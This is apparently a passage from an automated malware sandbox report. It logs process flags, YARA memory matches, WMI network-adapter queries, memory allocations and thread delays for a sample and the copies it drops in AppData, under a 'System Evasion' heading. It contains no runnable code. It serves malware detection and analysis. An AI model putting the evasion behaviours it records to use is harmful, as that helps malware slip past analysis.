                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: s2Jg1MAahY.exe PID: 7516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GedTanqRR.exe PID: 8088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 8184, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: 4EC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: 9330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: 7BD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: A330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: B330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: BB10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: CB10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: DB10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: 1890000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: 3250000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeMemory allocated: 5250000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: 17C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: 31B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: 51B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: 8FD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: 9FD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: A1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: B1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: B970000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: C970000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: 2B90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: 2D80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeMemory allocated: 2B90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 1A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3450000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3350000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9220000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: A220000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: A410000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: B410000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: BED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: CED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: DED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 1870000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 32E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3050000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 29E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2BD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 4BD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 8A80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9A80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 9C80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 7130000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: B2D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: C2D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 10D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 2B20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 4B20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599746Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599637Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599406Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599187Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598967Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598709Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598440Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598180Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 598078Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597968Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597640Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597530Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597297Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597186Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 597073Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596968Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596746Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596629Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596500Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596390Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596281Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596171Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 596062Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595952Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595837Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595715Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595592Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595323Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595218Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595109Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 595000Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594781Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594672Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594343Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594232Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeThread delayed: delay time: 594124Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599766
